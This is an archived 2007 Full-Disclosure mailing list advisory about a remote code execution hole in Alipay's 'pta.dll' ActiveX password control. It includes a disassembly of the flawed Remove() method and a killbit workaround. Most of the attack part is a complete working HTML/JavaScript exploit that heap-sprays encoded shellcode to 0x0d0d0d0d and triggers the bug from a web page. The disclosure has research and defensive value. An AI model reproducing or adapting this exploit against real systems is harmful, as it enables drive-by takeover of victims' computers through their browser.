lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY129-F3230E3AC16979CA23CFD2CB9E0@phx.gbl>
Date: Wed, 07 Feb 2007 03:49:10 +0000
From: "ruder cocoruder" <frankruder@...mail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Alibaba Alipay Remote Code Execute
	Vulnerability-0DAY

Alibaba Alipay Remote Code Execute Vulnerability

by cocoruder(frankruder_at_hotmail.com)
http://ruder.cdut.net


Summary:

    Alipay is China’s leading online payment service, and a division of 
Alibaba.com. It enables individuals and businesses to securely, easily and 
quickly send and receive payments online. Alipay works like an escrow 
service, solving the issue of settlement risk in China. More details:

    https://www.alipay.com

    There exists a remote code execute vulnerability in alipay's passsword 
input control "pta.dll". A remote attacker who successfully exploit these 
vulnerabilities can completely take control of the affected system.



Affected Software Versions:

    All current versions



Details:
	
    This vulnerability exist in the function "Remove()" educed by 
"pta.dll", following are some related imformations:

    InprocServer32:	pta.dll
    ClassID	  : 	66F50F46-70A0-4A05-BD5E-FBCC0F9641EC

    [id(0x60030001), helpstring("method Remove")]
    void Remove([in] int idx);

    Let's see How function "Remove()" process the parameter "idx":

	.text:10003D4E ; Remove
	.text:10003D4E
	.text:10003D4E sub_10003D4E    proc near			; DATA XREF: .rdata:1000B3A4.o
	.text:10003D4E							; .rdata:1000B41C.o ...
	.text:10003D4E
	.text:10003D4E arg_0           = dword ptr  4
	.text:10003D4E arg_4           = dword ptr  8
	.text:10003D4E
	.text:10003D4E                 mov     eax, [esp+arg_4]		
	.text:10003D52                 test    eax, eax
	.text:10003D54                 jl      short loc_10003D78	
	.text:10003D56                 push    esi
	.text:10003D57                 mov     esi, [esp+4+arg_0]	; get idx
	.text:10003D5B                 shl     eax, 4			; idx << 4
	.text:10003D5E                 add     eax, [esi+8]		; [esi+8]=0
	.text:10003D61                 push    edi			;
	.text:10003D62                 mov     edi, eax			; idx << 4 ==>edi
	.text:10003D64                 mov     eax, [edi+8]		; [(idx << 4)+8] 
==>eax
	.text:10003D67                 push    eax
	.text:10003D68                 mov     ecx, [eax]		; [[(idx << 
4)+8]]==>ecx
	.text:10003D6A                 call    dword ptr [ecx+8]	; [[[(idx << 
4)+8]]+8]==>jmp addr
	.text:10003D6D                 push    edi
	.text:10003D6E                 lea     ecx, [esi+4]
	.text:10003D71                 call    sub_10003F35
	.text:10003D76                 pop     edi
	.text:10003D77                 pop     esi
	.text:10003D78
	.text:10003D78 loc_10003D78:					; CODE XREF: sub_10003D4E+6.j
	.text:10003D78                 xor     eax, eax
	.text:10003D7A                 retn    8
	.text:10003D7A sub_10003D4E    endp

    The idx is a DWORD vaule what we can control, so we can complete an 
interesting attack, for example when we set the idx 0x41414141, the 
procedure will execute codes of address [[[14141410h+8]]+8].



Solution:

    Set a killbit for "pta.dll", or, delete %system%\aliedit\pta.dll if you 
do not use Alipay.



Disclosure Timeline:

    2007.02.07		Advisory release



Attached File:

    Here give an exploit, we se all address 0x0d0d0d0d which will access 
its value, can gain attack result nicely.
    Warning: This exploit is just used for reproducing the vulnerability, 
please do not used for others.


/************************************************************************************************

Alipay ActiveX Remote Code Execute Exploit,enjoy it:)
by cocoruder(frankruder_at_hotmail.com)
http://ruder.cdut.net
*************************************************************************************************/


<html>
<head>
<OBJECT ID="com" 
CLASSID="CLSID:{66F50F46-70A0-4A05-BD5E-FBCC0F9641EC}"></OBJECT>
</head>
<body>

<SCRIPT language="javascript">

function ClickForRunCalc()
{
    var heapSprayToAddress = 0x0d0d0d0d;

    var payLoadCode = 
unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090"+"%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");


    var heapBlockSize = 0x400000;

    var payLoadSize = payLoadCode.length * 2;

    var spraySlideSize = heapBlockSize - (payLoadSize+0x38);

    var spraySlide = unescape("%u0d0d%u0d0d");
    spraySlide = getSpraySlide(spraySlide,spraySlideSize);

    heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;

    memory = new Array();

    for (i=0;i<heapBlocks;i++)
    {
        memory[i] = spraySlide + payLoadCode;
    }
    
    com.Remove(0x00d0d0d0);

    function getSpraySlide(spraySlide, spraySlideSize)
    {
        while (spraySlide.length*2<spraySlideSize)
        {
            spraySlide += spraySlide;
        }
        spraySlide = spraySlide.substring(0,spraySlideSize/2);
        return spraySlide;
    }

}
</script>
<button onclick="javascript:ClickForRunCalc();">ClickForRunCalc</button>
</body>
</html>



--EOF--

_________________________________________________________________
享用世界上最大的电子邮件系统― MSN Hotmail。  http://www.hotmail.com  


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ